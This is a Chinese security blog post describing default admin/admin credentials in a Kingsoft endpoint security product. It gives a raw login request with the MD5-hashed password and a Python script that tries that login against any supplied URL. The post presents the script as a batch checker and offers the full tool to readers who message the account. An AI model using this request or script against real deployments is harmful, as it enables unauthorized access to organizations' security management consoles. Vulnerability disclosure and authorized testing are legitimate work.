金山某系统老漏洞

  • A+
所属分类:安全漏洞

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!


  某师傅给了我一个poc,是某安全终端的一个文件上传漏洞。本来想尝试复现一下写一个批量检测脚本,但是却以失败告终。碰巧遇见了安装后的默认账号密码,所以根据弱密码写出来批量检测脚本。


环境下载:

随便找个网站下载


复现过程:

下载完成后,直接傻瓜式安装,会直接打开一个txt文档,存放了默认密码

金山某系统老漏洞

在登录的时候使用默认密码登录并抓包分析,根据反复观察和尝试可以知道需要post一段json格式的代码到特定的路径,若返回包状态码为200并且有关键字段userSession即可判断漏洞存在

金山某系统老漏洞

Poc:

POST /inter/ajax.php?cmd=get_user_login_cm{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}


脚本主要代码:

def poc(url):  target = url+"/inter/ajax.php?cmd=get_user_login_cmd"  data = json.dumps({"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}})  try:    r = requests.post(url=target,data=data,verify=False,timeout=8)    if r.status_code==200 and "userSession" in r.text:      print("-"*50)      print(url+"  漏洞存在!")      print("默认账号密码为admin/admin")      print("-"*50)      print("n")    else:      print("-"*50)      print(url+"  漏洞不存在!")      print("-"*50)      print("n")  except:    print("请求失败!")

利用截图:

金山某系统老漏洞

金山某系统老漏洞

后台回复:金山V8 即可获取脚本,支持批量检测!


优质公众号推荐:


本文始发于微信公众号(Fight Tigers Team):金山某系统老漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: